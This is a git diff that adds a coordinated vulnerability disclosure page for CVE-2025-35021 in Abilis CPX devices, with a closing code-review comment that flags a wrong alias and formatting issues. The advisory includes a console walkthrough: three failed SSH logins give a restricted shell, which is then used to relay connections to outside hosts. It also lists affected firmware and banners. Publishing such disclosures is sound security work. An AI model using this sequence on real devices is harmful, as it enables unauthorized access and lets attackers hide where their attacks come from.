diff --git a/content/cve.md b/content/cve.md
index 7d8b8fd..23be972 100644
--- a/content/cve.md
+++ b/content/cve.md
@@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
| ----------------- | --------- | ------------------------------------------ | ---- |
| [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] |
| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] |
+| [CVE-2025-35021] | 0x00e5 | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] |
## Reserved GCVEs
@@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https://
| Meeting | GCVE (Reserved) |
|---------|-----------------|
| 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
-| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
@@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
[CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/
[CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/
[CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/
+[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001
[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
diff --git a/content/cves/CVE-2025-35021.md b/content/cves/CVE-2025-35021.md
new file mode 100644
index 0000000..4ede489
--- /dev/null
+++ b/content/cves/CVE-2025-35021.md
@@ -0,0 +1,129 @@
+---
+title: CVE-2025-35021
+aliases:
+ - /cves/CVE-2025-35027.html
+ - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
+publishDate: 2025-11-03T18:06:00-06:00
+
+---
+
+## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay
+
+[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org.
+
+The [GCVE](https://gcve.eu/about/) identifier for this issue is [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]
+
+# Executive Summary
+
+By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*.
+
+# Technical Details
+
+A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.
+
+In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt.
+
+```
+$ ssh root@[TARGET]
+root@TARGET's password:
+
+COM
+
+Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
+Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
+Login: bad
+
+PERMISSION DENIED
+
+Login: bad
+
+PERMISSION DENIED
+
+Login: bad
+
+PERMISSION DENIED
+
+
+CLR F0 AE
+
+[192.168.11.002] SSHS>
+```
+
+At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell:
+
+```
+[192.168.11.002]help
+CP Open connection to local CP resource
+SSH Open connection to local SSH client
+TELNET Open connection to local TELNET client
+- Open X25 call with CD and UD
+CLR Close connection
+CLOSE Close SSH Session
+EXIT Close SSH Session
+HELP Show current help
+[192.168.11.002] SSHS>SSH
+[192.168.11.002] SSHC>
+[192.168.11.002] SSHC>OPEN 8.8.8.8:53
+Trying 8.8.8.8:53 ... Open
+
+Version identification fault
+```
+
+Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way:
+```
+[192.168.11.002] SSHS>TELNET
+[192.168.11.002] TELNETC>
+[192.168.11.002]TELNETC>open 1.2.3.4:5678
+Trying 1.2.3.4:5678 ... Open
+```
+
+## Affected Products
+
+Affected versions of CPX devices include:
+
+* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
+* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
+* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
+* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
+* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
+* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
+* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
+* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
+* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0
+
+Across these devices, affected SSH banners include:
+
+* SSH-1.99-CPX SSH Server
+* SSH-2.0-CPX SSH Server
+
+## Mitigation
+
+According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.
+
+# Attacker Value
+
+By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.
+
+# Credit
+
+This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA.
+
+# Timeline
+
+* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble]
+* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
+* 2025-08-20 (Wed): Provided technical details to the vendor
+* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
+* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7)
+* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved
+* 2025-11-03 (Mon): This public disclosure
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021
+[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc
+[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8
+[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
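Review bot: the front-matter alias `- /cves/CVE-2025-35027.html` in this new file names the wrong CVE. The page's title is CVE-2025-35021, so as written it claims the CVE-2025-35027 `.html` path for this page and leaves no `.html` alias for CVE-2025-35021; it should read `/cves/CVE-2025-35021.html`. Two smaller points in the body: the opening paragraph cites "runZero's standard [disclosure policy]" while the `[disclosure policy]` reference at the bottom resolves to https://takeonme.org/cve.html, so please confirm which organization's policy is meant. Also, the page title is a `##` heading while the sections under it (`# Executive Summary`, `# Technical Details`, and so on) are `#`, which inverts the hierarchy. The `TELNETC` paragraph also runs straight into its code fence without the blank line that the other console examples have.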